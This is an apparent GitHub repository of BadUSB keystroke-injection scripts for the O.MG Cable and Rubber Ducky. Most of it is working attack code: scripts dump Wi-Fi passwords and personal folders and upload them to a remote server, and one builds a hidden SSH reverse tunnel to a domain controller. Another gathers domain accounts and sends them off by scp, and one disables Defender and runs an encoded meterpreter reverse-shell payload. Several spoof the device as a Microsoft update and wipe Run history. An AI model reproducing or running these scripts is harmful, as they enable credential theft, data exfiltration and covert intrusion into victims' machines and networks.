├── .gitignore ├── README.md ├── scripts ├── Win-Get_SSID_Info-HTTP.ducky.txt ├── Win-Get_SSID_Info-HTTP.omg.txt ├── Win-SSH_DC_Tunnel.ducky.txt ├── Win-SSH_DC_Tunnel.omg.txt ├── Win-SimpleWebOpener.ducky.txt ├── Win-SimpleWebOpener.omg.txt └── wip │ ├── Win-Exfiltrate_ALL-HTTP.omg.txt │ ├── Win-Exfiltrate_Personal-HTTP.omg.txt │ ├── Win-Gather_System_Info.ducky.txt │ ├── powershell-load.txt │ └── wallpaper-change.txt └── todo.md /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | OMDucky 2 | ============= 3 | Hello! This is a collection of scripts for O.MG Cable and Rubber Ducky. There should be a version for both systems, see `omg.txt` files vs `ducky.txt` files. 4 | 5 | All of the details of how the script works, I've commented in the script files directly. Notably, see any `~~` double-tilde line comments for strings that you need to modify per your own needs. 6 | 7 | Some of these scripts are based on ideas of others, I will have links/shoutouts in the comments of those scripts as well. 8 | 9 | The "wip" directory for scripts that are not fully tested, and I'm still working on. 10 | 11 | 12 | Notable Differences: 13 | =========== 14 | - Since April 1st firmware, the majority of issues were fixed, and the syntax between O.MG and Rubber Ducky is almost exactly the same. 15 | - Some syntax differences: 16 | - O.MG can set VID, PID, MAN and PRO fields, Rubber Ducky cannot 17 | - Rubber Ducky I recommend a delay before first command is sent (`DELAY 2222`) 18 | - Otherwise, the two script versions should be exactly the same 19 | - This generally means: Rubber Ducky scripts will work as-is in O.MG, although they might not be fully optimized 20 | 21 | 22 | Useful Links 23 | ========= 24 | O.MG Firmware - https://github.com/O-MG/O.MG_Cable-Firmware 25 | 26 | -------------------------------------------------------------------------------- /scripts/Win-Get_SSID_Info-HTTP.ducky.txt: -------------------------------------------------------------------------------- 1 | REM | Win-Get_SSID_Info-HTTP 2 | REM | 3 | REM | This script will gather the user's Wifi SSID profiles (including any PSK's/passcodes), zip them up, 4 | REM | then upload them to some public HTTP server via PUT. 5 | REM | 6 | REM | This does require you setting up a HTTP server to receive the files, see comments in the script lines. 7 | REM | 8 | REM | See all "REM ~~" tilde lines below for code that needs to be modified! 9 | REM | 10 | REM | Based on ideas from dantedmc4 / Dante Sparda 11 | REM | https://github.com/dantedmc4/poundplay 12 | REM | 13 | REM | Written by JeffTadashi 14 | REM | https://github.com/JeffTadashi/omducky/ 15 | REM | 16 | DELAY 2222 17 | GUI r 18 | DELAY 1000 19 | STRING powershell 20 | ENTER 21 | DELAY 2000 22 | REM | Command below erases the "Run" history. This is optional. 23 | STRING powershell "rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 24 | ENTER 25 | DELAY 2000 26 | REM | Export wlan profiles into xml files (including clear-test PSK's) into current directory 27 | STRING netsh wlan export profile key=clear 28 | ENTER 29 | REM | Collect all xml files into a single zip file 30 | STRING Compress-Archive -U -Path .\*.xml -DestinationPath .\temp.zip 31 | ENTER 32 | DELAY 3000 33 | REM | Generate random filename base for uploading later 34 | STRING $r=[System.IO.Path]::GetRandomFileName() 35 | ENTER 36 | REM | Upload via HTTP PUT method. Requires a public webserver with PUT capabilities. 37 | REM | Here is an example python HTTP server: https://gist.github.com/fabiand/5628006 38 | REM ~~ | Change "example.com" with public IP or domain-name of your HTTP server with PUT capabilities. 39 | STRING Invoke-Restmethod -Uri http://example.com/$r.zip -Method Put -Infile .\temp.zip 40 | ENTER 41 | DELAY 2000 42 | REM | File cleanup and exit... 43 | STRING rm .\temp.zip 44 | ENTER 45 | STRING rm .\*.xml 46 | ENTER 47 | STRING exit 48 | ENTER 49 | 50 | -------------------------------------------------------------------------------- /scripts/Win-Get_SSID_Info-HTTP.omg.txt: -------------------------------------------------------------------------------- 1 | REM | Win-Get_SSID_Info-HTTP 2 | REM | 3 | REM | This script will gather the user's Wifi SSID profiles (including any PSK's/passcodes), zip them up, 4 | REM | then upload them to some public HTTP server via PUT. 5 | REM | 6 | REM | This does require you setting up a HTTP server to receive the files, see comments in the script lines. 7 | REM | 8 | REM | See all "REM ~~" tilde lines below for code that needs to be modified! 9 | REM | 10 | REM | Based on ideas from dantedmc4 / Dante Sparda 11 | REM | https://github.com/dantedmc4/poundplay 12 | REM | 13 | REM | Written by JeffTadashi 14 | REM | https://github.com/JeffTadashi/omducky/ 15 | REM | 16 | VID 045E 17 | PID 0048 18 | MAN Microsoft 19 | PRO Windows Defender Update 20 | GUI r 21 | DELAY 1000 22 | STRING powershell 23 | ENTER 24 | DELAY 2000 25 | REM | Command below erases the "Run" history. This is optional. 26 | STRING powershell "rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 27 | ENTER 28 | DELAY 2000 29 | REM | Export wlan profiles into xml files (including clear-test PSK's) into current directory 30 | STRING netsh wlan export profile key=clear 31 | ENTER 32 | REM | Collect all xml files into a single zip file 33 | STRING Compress-Archive -U -Path .\*.xml -DestinationPath .\temp.zip 34 | ENTER 35 | DELAY 3000 36 | REM | Generate random filename base for uploading later 37 | STRING $r=[System.IO.Path]::GetRandomFileName() 38 | ENTER 39 | REM | Upload via HTTP PUT method. Requires a public webserver with PUT capabilities. 40 | REM | Here is an example python HTTP server: https://gist.github.com/fabiand/5628006 41 | REM ~~ | Change "example.com" with public IP or domain-name of your HTTP server with PUT capabilities. 42 | STRING Invoke-Restmethod -Uri http://example.com/$r.zip -Method Put -Infile .\temp.zip 43 | ENTER 44 | DELAY 2000 45 | REM | File cleanup and exit... 46 | STRING rm .\temp.zip 47 | ENTER 48 | STRING rm .\*.xml 49 | ENTER 50 | STRING exit 51 | ENTER 52 | 53 | -------------------------------------------------------------------------------- /scripts/Win-SSH_DC_Tunnel.ducky.txt: -------------------------------------------------------------------------------- 1 | REM | Win-SSH_DC_Tunnel 2 | REM | 3 | REM | This script will identity an active Domain Controller, then build an SSH reverse tunnel to the attacker, 4 | REM | and giving the attacker network access to the Domain Controller. 5 | REM | 6 | REM | For setup, your attacker machine needs public IP ssh access with a user/password created for this purpose. 7 | REM | Once script is successful, you can access common DC ports on this machine, such as "curl localhost:10080" 8 | REM | (Common DC ports will have 10000 added to them, so SMB/445 will be at localhost:10445, etc) 9 | REM | 10 | REM | This script uses the built in SSH function that is installed by default on newer Win10 deployments. 11 | REM | Does not require admin access on victim, and generally will be allowed by Windows Defender or other antiviruses. 12 | REM | (However, this does not gain any shell access to victim machine) 13 | REM | Script also hides the powershell console, and SSH runs in the background indefinitely. 14 | REM | 15 | REM | See all "REM ~~" tilde lines below for code that needs to be modified! 16 | REM | 17 | REM | Written by JeffTadashi 18 | REM | https://github.com/JeffTadashi/omducky/ 19 | REM | 20 | DELAY 2222 21 | GUI r 22 | DELAY 1000 23 | STRING powershell 24 | ENTER 25 | DELAY 2000 26 | REM | Command below erases the "Run" history. This is optional. 27 | REM | (DevNotes) To Test: change "Remove-ItemProperty" to "rp" for shortness 28 | STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 29 | ENTER 30 | DELAY 2000 31 | REM | In CMD prompt, use "%logonserver:~2%" to get plain DC server name. 32 | REM | In powershell, use "$env:LOGONSERVER.substring(2)", but must be variable substituted. Substitution is below 33 | STRING $D=$env:LOGONSERVER.substring(2) 34 | ENTER 35 | REM ~~ | Change the username@IP to your attacking machine, on a public IP 36 | STRING powershell -windowstyle hidden -command ssh -fN -o "StrictHostKeyChecking=no" -R 10021:"$D":21 -R 10053:"$D":53 -R 10080:"$D":80 -R 10088:"$D":88 -R 10135:"$D":135 -R 10139:"$D":139 -R 10389:"$D":389 -R 10443:"$D":443 -R 10445:"$D":445 -R 10464:"$D":464 -R 10636:"$D":636 -R 13268:"$D":3268 -R 13269:"$D":3269 -R 13389:"$D":3389 -R 15985:"$D":5985 -R 15986:"$D":5986 username@IP 37 | ENTER 38 | DELAY 2000 39 | REM ~~ | Change p@ssw0rd! below to the ssh user's password 40 | STRING p@ssw0rd! 41 | ENTER 42 | 43 | 44 | -------------------------------------------------------------------------------- /scripts/Win-SSH_DC_Tunnel.omg.txt: -------------------------------------------------------------------------------- 1 | REM | Win-SSH_DC_Tunnel 2 | REM | 3 | REM | This script will identity an active Domain Controller, then build an SSH reverse tunnel to the attacker, 4 | REM | and giving the attacker network access to the Domain Controller. 5 | REM | 6 | REM | For setup, your attacker machine needs public IP ssh access with a user/password created for this purpose. 7 | REM | Once script is successful, you can access common DC ports on this machine, such as "curl localhost:10080" 8 | REM | (Common DC ports will have 10000 added to them, so SMB/445 will be at localhost:10445, etc) 9 | REM | 10 | REM | This script uses the built in SSH function that is installed by default on newer Win10 deployments. 11 | REM | Does not require admin access on victim, and generally will be allowed by Windows Defender or other antiviruses. 12 | REM | (However, this does not gain any shell access to victim machine) 13 | REM | Script also hides the powershell console, and SSH runs in the background indefinitely. 14 | REM | 15 | REM | See all "REM ~~" tilde lines below for code that needs to be modified! 16 | REM | 17 | REM | Written by JeffTadashi 18 | REM | https://github.com/JeffTadashi/omducky/ 19 | REM | 20 | VID 045E 21 | PID 0048 22 | MAN Microsoft 23 | PRO Windows Defender Update 24 | GUI r 25 | DELAY 1000 26 | STRING powershell 27 | ENTER 28 | DELAY 2000 29 | REM | Command below erases the "Run" history. This is optional. 30 | REM | (DevNotes) To Test: change "Remove-ItemProperty" to "rp" for shortness 31 | STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 32 | ENTER 33 | DELAY 2000 34 | REM | In CMD prompt, use "%logonserver:~2%" to get plain DC server name. 35 | REM | In powershell, use "$env:LOGONSERVER.substring(2)", but must be variable substituted. Substitution is below 36 | STRING $D=$env:LOGONSERVER.substring(2) 37 | ENTER 38 | REM ~~ | Change the username@IP to your attacking machine, on a public IP 39 | STRING powershell -windowstyle hidden -command ssh -fN -o "StrictHostKeyChecking=no" -R 10021:"$D":21 -R 10053:"$D":53 -R 10080:"$D":80 -R 10088:"$D":88 -R 10135:"$D":135 -R 10139:"$D":139 -R 10389:"$D":389 -R 10443:"$D":443 -R 10445:"$D":445 -R 10464:"$D":464 -R 10636:"$D":636 -R 13268:"$D":3268 -R 13269:"$D":3269 -R 13389:"$D":3389 -R 15985:"$D":5985 -R 15986:"$D":5986 username@IP 40 | ENTER 41 | DELAY 2000 42 | REM ~~ | Change p@ssw0rd! below to the ssh user's password 43 | STRING p@ssw0rd! 44 | ENTER 45 | 46 | 47 | -------------------------------------------------------------------------------- /scripts/Win-SimpleWebOpener.ducky.txt: -------------------------------------------------------------------------------- 1 | REM | Win-SimpleWebOpener 2 | REM | 3 | REM | This is a script to simply open a web page in Windows 10/7. 4 | REM | 5 | REM | Can be used for fake phishing websites (see gophish.com), or for BSOD pranks (see fakebsod.com or geekprank.com) 6 | REM | 7 | REM | See all "REM ~~" tilde lines below for code that needs to be modified 8 | REM | 9 | REM | Written by JeffTadashi 10 | REM | https://github.com/JeffTadashi/omducky/ 11 | REM | 12 | DELAY 2222 13 | GUI r 14 | DELAY 1000 15 | REM ~~ | Change line below to desired browser: chrome, firefox, iexplore, etc. 16 | STRING chrome 17 | ENTER 18 | DELAY 4000 19 | REM | Alt+D below moves cursor focus to the URL bar. This is needed for Internet Explorer and Edge (Does not impact Chrome or Firefox) 20 | ALT d 21 | REM ~~ | Change line below to desired URL 22 | STRING http://fakebsod.com/windows-8-and-10 23 | ENTER 24 | REM ~~ | Change line below to "GUI UP" to maximize screen. Change line below to "F11" to fullscreen. 25 | F11 26 | -------------------------------------------------------------------------------- /scripts/Win-SimpleWebOpener.omg.txt: -------------------------------------------------------------------------------- 1 | REM | Win-SimpleWebOpener 2 | REM | 3 | REM | This is a script to simply open a web page in Windows 10/7. 4 | REM | 5 | REM | Can be used for fake phishing websites (see gophish.com), or for BSOD pranks (see fakebsod.com or geekprank.com) 6 | REM | 7 | REM | See all "REM ~~" tilde lines below for code that needs to be modified 8 | REM | 9 | REM | Written by JeffTadashi 10 | REM | https://github.com/JeffTadashi/omducky/ 11 | REM | 12 | VID 045E 13 | PID 0048 14 | MAN Microsoft 15 | PRO Windows Defender Update 16 | GUI r 17 | DELAY 1000 18 | REM ~~ | Change line below to desired browser: chrome, firefox, iexplore, etc. 19 | STRING chrome 20 | ENTER 21 | DELAY 4000 22 | REM | Alt+D below moves cursor focus to the URL bar. This is needed for Internet Explorer and Edge (Does not impact Chrome or Firefox) 23 | ALT d 24 | REM ~~ | Change line below to desired URL 25 | STRING http://fakebsod.com/windows-8-and-10 26 | ENTER 27 | REM ~~ | Change line below to "GUI UP" to maximize screen. Change line below to "F11" to fullscreen. 28 | F11 29 | 30 | -------------------------------------------------------------------------------- /scripts/wip/Win-Exfiltrate_ALL-HTTP.omg.txt: -------------------------------------------------------------------------------- 1 | REM | Win-Exfiltrate_Personal-HTTP 2 | REM | 3 | REM | This script exfiltrates wireless SSID profiles and Doc/Down/Desk 4 | REM | Condensed to single command, in hidden Powershell window, for best stealth. 5 | REM | 6 | REM | 7 | REM | Written by JeffTadashi 8 | REM | https://github.com/JeffTadashi/omducky/ 9 | REM | 10 | VID 045E 11 | PID 0048 12 | MAN Microsoft 13 | PRO Windows Defender Update 14 | GUI r 15 | DELAY 1000 16 | STRING powershell -nop -w hidden 17 | ENTER 18 | DELAY 2000 19 | STRING rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue;netsh wlan export profile key=clear;Compress-Archive -U -Path .\*.xml,~\Desktop\*,~\Downloads\*,~\Documents\* -DestinationPath .\temp.zip;$r=[System.IO.Path]::GetRandomFileName();irm -Uri http://192.168.200.202:8000/$r.zip -Method Put -Infile .\temp.zip;rm .\temp.zip,.\*.xml;exit 20 | ENTER 21 | -------------------------------------------------------------------------------- /scripts/wip/Win-Exfiltrate_Personal-HTTP.omg.txt: -------------------------------------------------------------------------------- 1 | REM | Win-Exfiltrate_Personal-HTTP 2 | REM | 3 | REM | This script 4 | REM | 5 | REM | 6 | REM | 7 | REM | Written by JeffTadashi 8 | REM | https://github.com/JeffTadashi/omducky/ 9 | REM | 10 | VID 045E 11 | PID 0048 12 | MAN Microsoft 13 | PRO Windows Defender Update 14 | GUI r 15 | DELAY 1000 16 | STRING powershell 17 | ENTER 18 | DELAY 2000 19 | REM | Command below erases the "Run" history. This is optional. 20 | STRING rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue 21 | ENTER 22 | DELAY 2000 23 | REM | Collect downloads/desktop/documents folders into a zip 24 | STRING Compress-Archive -U -Path ~\Desktop\*,~\Downloads\*,~\Documents\* -DestinationPath .\temp.zip 25 | ENTER 26 | DELAY 3000 27 | REM | Generate random filename base for uploading later 28 | STRING $r=[System.IO.Path]::GetRandomFileName() 29 | ENTER 30 | REM | Upload via HTTP PUT method. Requires a public webserver with PUT capabilities. 31 | REM | Here is an example python HTTP server: https://gist.github.com/fabiand/5628006 32 | REM ~~ | Change "example.com" with public IP or domain-name of your HTTP server with PUT capabilities. 33 | STRING Invoke-Restmethod -Uri http://example.com/$r.zip -Method Put -Infile .\temp.zip 34 | ENTER 35 | DELAY 2000 36 | REM | File cleanup and exit... 37 | STRING rm .\temp.zip 38 | ENTER 39 | STRING exit 40 | ENTER 41 | -------------------------------------------------------------------------------- /scripts/wip/Win-Gather_System_Info.ducky.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | REM | Reference: https://github.com/nixawk/pentest-wiki/tree/master/1.Information-Gathering/Windows 4 | DELAY 1000 5 | GUI r 6 | DELAY 1000 7 | STRING cmd 8 | ENTER 9 | DELAY 2000 10 | STRING powershell -windowstyle hidden -command cmd 11 | ENTER 12 | DELAY 2000 13 | STRING echo ##whoami >> sys 14 | ENTER 15 | STRING whoami >> sys 16 | ENTER 17 | STRING echo ##ver >> sys 18 | ENTER 19 | STRING ver >> sys 20 | ENTER 21 | STRING echo ##systeminfo >> sys 22 | ENTER 23 | STRING systeminfo >> sys 24 | ENTER 25 | STRING echo ##ipconfig /all >> sys 26 | ENTER 27 | STRING ipconfig /all >> sys 28 | ENTER 29 | STRING echo ##ipconfig /displaydns >> sys 30 | ENTER 31 | STRING ipconfig /displaydns >> sys 32 | ENTER 33 | DELAY 5000 34 | STRING echo ##wmic os list brief >> sys 35 | ENTER 36 | STRING wmic os list brief >> sys 37 | ENTER 38 | STRING echo ##wmic computersystem list full >> sys 39 | ENTER 40 | STRING wmic computersystem list full >> sys 41 | ENTER 42 | STRING echo ##wmic qfe get hotfixid >> sys 43 | ENTER 44 | STRING wmic qfe get hotfixid >> sys 45 | ENTER 46 | STRING echo ##tasklist >> sys 47 | ENTER 48 | STRING tasklist >> sys 49 | ENTER 50 | STRING echo ##net user>> sys 51 | ENTER 52 | STRING net user >> sys 53 | ENTER 54 | STRING echo ##net use /domain >> sys 55 | ENTER 56 | STRING net user /domain >> sys 57 | ENTER 58 | STRING echo ##net group "Domain Admins" /domain >> sys 59 | ENTER 60 | STRING net group "Domain Admins" /domain >> sys 61 | ENTER 62 | STRING echo ##net group "Domain Controllers" /domain >> sys 63 | ENTER 64 | STRING net group "Domain Controllers" /domain >> sys 65 | ENTER 66 | DELAY 5000 67 | STRING scp sys omg@192.168.200.224:~/ 68 | ENTER 69 | DELAY 2000 70 | REM ~~ | Change p@ssw0rd! below to the ssh user's password 71 | STRING yes 72 | ENTER 73 | DELAY 5000 74 | STRING del sys 75 | ENTER 76 | STRING exit 77 | ENTER 78 | 79 | -------------------------------------------------------------------------------- /scripts/wip/powershell-load.txt: -------------------------------------------------------------------------------- 1 | REM | 2 | REM | 3 | REM | 4 | REM | 5 | REM | 6 | REM | 7 | REM (First, we will disable firewall through GUI traversal methods) 8 | DELAY 1000 9 | CONTROL ESCAPE 10 | DELAY 2000 11 | STRING virus & threat protection 12 | DELAY 2000 13 | ENTER 14 | DELAY 3000 15 | TAB 16 | DELAY 80 17 | TAB 18 | DELAY 80 19 | TAB 20 | DELAY 80 21 | ENTER 22 | DELAY 3000 23 | REM (Now on correct settings page to turn off real-time) 24 | REM (Space to change to off) 25 | SPACE 26 | DELAY 2000 27 | REM (Left then enter, to bypass user interaction) 28 | LEFT 29 | DELAY 100 30 | ENTER 31 | DELAY 2000 32 | REM (exit settings dialogs) 33 | ALT F4 34 | DELAY 3000 35 | REM (Now, we can start powershell execution) 36 | CONTROL ESCAPE 37 | DELAY 2000 38 | STRING powershell 39 | DELAY 2000 40 | ENTER 41 | DELAY 4000 42 | REM (Open new powershell console as admin, close existing) 43 | STRING Start-Process PowerShell -Verb RunAs; exit 44 | DELAY 100 45 | ENTER 46 | REM hit LEFT and ENTER to go through Admin prompt 47 | DELAY 2000 48 | LEFT 49 | DELAY 100 50 | ENTER 51 | DELAY 4000 52 | REM ~~ Execute powershell command payload below, as admin, below: 53 | REM TEMP Testing with payload (fw is fine enabled): 54 | REM msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.200.16 LPORT=80 -f psh-cmd -o payload-x64-80.txt 55 | REM (putting --shortest parameter didn't seem to work. Still need to test HTTPS without shortest...) 56 | REM starting from "powershell.exe" part... 57 | STRING powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACcASAA0AHMASQBBAEsAbwBEAHMAbAAwAEMAQQA3AFYAVwBhADQALwBhAFIAaABUADkAbgBFAGoANQBEADEAYQBGAGgARgBFAEoAMgBDAHkAYgA3AGsAYQBLAFYAQgB0AHMATQBNAEcAQQA4AFEAdgBZAG8AcwBoAHIARAAvAFkAcwA0ADAAZgBzAE0AWQA5AHQAKwA5ADkANwB4ADgAQgBtAHEAMgB6AGEAcABGAEsAdABYAFQARwBQACsAegB6ADMAegBOAHoAWgBsAEkAbABQAGMAWgBwAHcAWABzAHIAOQAvAHUAYgAxAHEANQBtAFgAZQB6AEgASAAxADcAYQArADMAWgBHAGEAWABDADIAKwBqAHEAMwBHAHEAMQBlAHcAVQA4AHMALwBJAGUANABEAHgAOQA5AEoAVwBkAFoAUABZAHcAOABuADYALwBmAHYAZQAyAFcAZQBvADQAUwBlADUAcQAwAEIAbwBsAEoAUgBvAFAAaQBlAFkARgBUAHcARABlADQAUAB6AG8AMQBRAGoAdAA1AE8ANwB4ACsAUQBUADcAbgBmAHUAZABxAG4AMQBvAEMAawA5AHgANAA1AGkAeAAxADcAbgBoADgAaAA3AHEAMgBVAEIARwB4AHYAbgBQAG8AZQBDADYAWgBsAFoAZwBSAFQAdgB2ADcAYgBiAC8AWABHADMAVgB0AHgAMwBWAEkAKwBsAHgANABwACsATABwADUATABDAGkASwBXAHcARQBoADkAUQBiADMAWgA0AE0ANQB0AEkANABaADQAdQBzADYAOQB2AE8AMABTAEQAZQAwADUAZQBMAGsAcQB0AE8AeQBrADgATABiAG8AQQBsAFkAMgB5AEUAZAAwAFMAZwBOAGkAbgBvAEQAawBvAEMALwBIAE4ARQB5AFQAegBpAFcARAB0AE0ALwA3AGYASgAxAEcATQA3AHkAMQBKAGUAQwBJAEUAZABGAFUAVwA5AHkAZAA4AHoAeQAzAFgAcgA5AEsAMwA5ADMAZABqAHMAdgBFADQAcABqADEATgBJAFMAaQB2AEkAMABNADEARwArAHcAegA0AHEAVwBrAE0AdgBDAFEAaQBhAG8AOAAwAGEAdABFAHkAYQA0AHkAUgBjAE4AeABvAGcAdABrAHUAMwBpAEsAOABsAEoAUwBGAE4ANwBrAGYATQA4AEIATwAwAHYANABEADIAdgBVAHIAOABjAHkAVwBRAG0AdABHADgAMABZAFIAQwBmAHAAMgBtAG4AZwBZAGwAUQBTAGYARgArAGcAdAB4AG4AbQByAGYAZwBPADkAUwBmADAARAB1AHoAegBlAHYAMwA3AHoAZQBYAE0AaQBTAGIAWQBYAGQAYwA3AHIAQQA2AE4AVgBkAE4AVQBZAFEASABqADkATABDADEAegBKAGYAZQBDAEUASgBxAGUARABKADQAKwBtACsAUgBHAG0ATgBTAHMAdgBVAFcAUAA5AEIAQwA1AFgAbwArAFcATgAyAFAAeQAyAHYAbgBnAFIAQgB0AEcASABUAGoAZQBXAFkATwAzAE8AUwBYAEcAdwBCAHAAMQB6AFIAVwB2AGIAMgAwAC8AUgBaADcAYgB4AGIAVwByADIAMABRAFkAbgBxAEgAOQBNAHYAQgBqADcARgAvAGIAeABMAHcARwBOAE4AZwBSAFYAVwBiAFkAdQBZAGgATQBJAGkANgArAGYATgAxAEQAUQBSAHcAUwBGAEgAbQBYAFkAcwBYAHAALwBwAGEAYgBFAG0ARAA3AHAAeQBpAFUAbQBBAGMAbwBsAEgANABwAFYAUQBGAFIAUQB4ADgAYgBmAGcAegBtAFYAZwA2ADkAcgBpAFkANQBpAFEATwBrADAAQgB3AEwAVwBOAHMAQgA1AGQASgBFACsAOAAvAHgANAA4AGMANwBtAEkARgBUAHYARQBhADgAbwBtAHQAeQBzAGgARQBQAG4ATgB6AGsAVABlAFEAUQBGAFQAVQA1AEsAQwBuAHoAZQBrAGsAcQBhAFYAcwBQADYAbAAzAEQAMQBrAGwARABzAGUAdwBXADkAbQBGAHMAMwBuAG8AQQA4AE8AKwB5AGwAUwBVAEgAegAwAG8AZgBLAFEAZgBLAFcAbQBTAEUAZgBlADQAUgBoADAAZQBTAEcATwBFAEQAeQAwAGMAVABoAHgAWABIADkAUgBTAFIANgBIAGkARgB3AEcATQBEAFMARABpAG8AQgBLAHcAdwBCAGsAegBJACsANQBCAEIAagBWAGYAdABHAHkAMABSAFUAaQB6AE8AQwBZAHAAQwBwAGoAcgA5AEsAdgBCAEEATwArADUAbgB5AEYAWQBHADgARQBBAFgAMQByADAASwA4AGsAUAByAEUAWQBJAGIARwBCAFkAWgBuAEEAVQBLAEoAVABaAEwAUwBKAHUAZgBnAG4ATQBJADEAdwBwAEMAdABtAFAAVABmAEEAbgBoADIAZwA1AHgAQwA2AGUAWABvAFgAQQA3ACsAYwBrADcAdQA1AEMATgBsADcASwA3AHQATgBNAGIASwBNAHoAQQBWAEQARABrAEYAQwBOAFEAOABqAFcAVwB2AFEATwArADYAcAA5AHUAQwAvADYAbQB0ADQAUAA3ADEAcgBKADgAKwBTAHYAQQBwADYAdAB4AHcAWgBOAE4AMgBWAHAAbwBlAGoASQBpAHAAVQBYAE8AcAA0AEwARQBkAFIAUgBvAFcAdABSAEQAbQBSADEAcwBKAFoAMQBUAEkAUABsAHIAVwBjAEcAVAAyAGgAMQBMAGUAUAAwAFEAYgBTAFMAcwAwAFoAUwBnAGYARABWAEcAVwAvAEMASAArAHgAUgBuAEoAdABnADEANgB1AEQAYwAyAEgAZwA2AGEARgBNAGgAeAB1AEEAaQBYAHYAYgAwADIAaQB4AFkAYQBPAE8AcQBOAFEAeQAyAEUAWAAxAG0ATABmAEYAbABZAEMAYQBFAHMAcQBMADIAeABLAFUAYwBLAEYAcQBUAFEATgBJAFoARwBWADEAeABwADcAUgBzAGkANAAwAGQAVABNADYAVwBoACsAKwBUAHYAeQBZAC8AUwA3AFEANABYAEIAMAB1AGEANgBDAE0AcABVAHEAZQBCAEsAbgBiAFUAUwBuAC8ATAA5AEYAZgBiAHcAYgBpAHYAVgBIAE8AZgB6AFkAMQBsAG8AVwBBAEYALwBDAGoAcQAwAG4AQQBpADUARABxAFoANwBDAHIAcQB5AG4AQQB5AEwAZgB4ADUASAB4AHIATwB1AE4AMQBWAEkAeABuAFcATgBYAHcAWQBaADIAWQBiAFAAbABFAEUASABLAGgAbAAzAGwAOQBmAGUAZQA1ADEAZABoADgANwBBAG0ARABrAG0AbABvAFMAbQBmADYAbQBaAHcAMwA5AFcARwA2ADMASABWAHUAYwBhAEIAaQBwAGwAcgBzAFYARABuAHQARgBPAEIAeQBkAEMAZQBpAGsANwA1AHcAawBUAGgAaQBzADAAcQB6AHQAdgBKAE4AdQAyAE8AZwB3AHQAYgBSAFMAdAA1AGIAZAA4AFkATwAyADEAMwB2AGQAdwB5AFMAVQBQAGIAQQBuAGcAegAzAEoAcgBtAHAAdwAwAHYAZABDAFoAaQBOAGIANABGAFYANwA4AEcAUgBqADUATABQAFIAegB0AGkAdQBUAE0AcwBlAHkAZgBmAHUAOQBkAEYAUAA1AG4ATQBkAHMARgBwAHQANQA0AHUAcABNADkAOABhAGkAeQBVADEAeQBhAGgAdgAyAEkARQBRAEsARwBMAC8ALwBsAEcAaQBjADEAZQAxAEoAaAAzAFMAOAA5AFUAQQBCADQAbQBjAHUAeABZAFoATABJADYAaQBhAEEAMQBXAE0ANgBTAEkAVwAwAGMAcAA5AHMAWgBXAE8ANABKADIAMQAzAHEAYwBqAHcAMwBIAG0AUgB2AEMAegBjAEcATQA1ADQAOQB6AEoAWQBvADgAdwBTAGwAMQBsADYAaQAyAE0ANwBtAGUARABnAE4AMwBEAGoAagBmAHUAOABLAGoANgBSAGIANwArAFYAVwBtAFQAZAAxADUAWgBnADYANgBqADcAcQB5ADcAQwA1AEoAOQB1AEIAYwBUAFgAVABmAFcAZQBtAEwAegBqAHcAeABIAEoASQA3AEMAZQBsAE0AaABGAHQAOQBSAFgAdwBSAFcAWABZAFgAeABWAHYAUgBkAEYASwBKADUAVwAyAEwAcgBBADUAVgB6AGwAbwBKAHgATgBBADAAbwAwAHIAWABWAGkARgAvAHcAUABpAGQAYQBKAGQAVAB3AEIAaABrAEIAMQA2AFkAYgBVAEIAZQB3AHgAcwBWAEgAQgBEADIAYgA5AGwAQwBNAHQAeABqAFkAVABBAFkANwB0AHIAaQBjAGkARQBGADgAMQB2AHQAYwBEAFAAUQBsAEwAMABrAEEAWA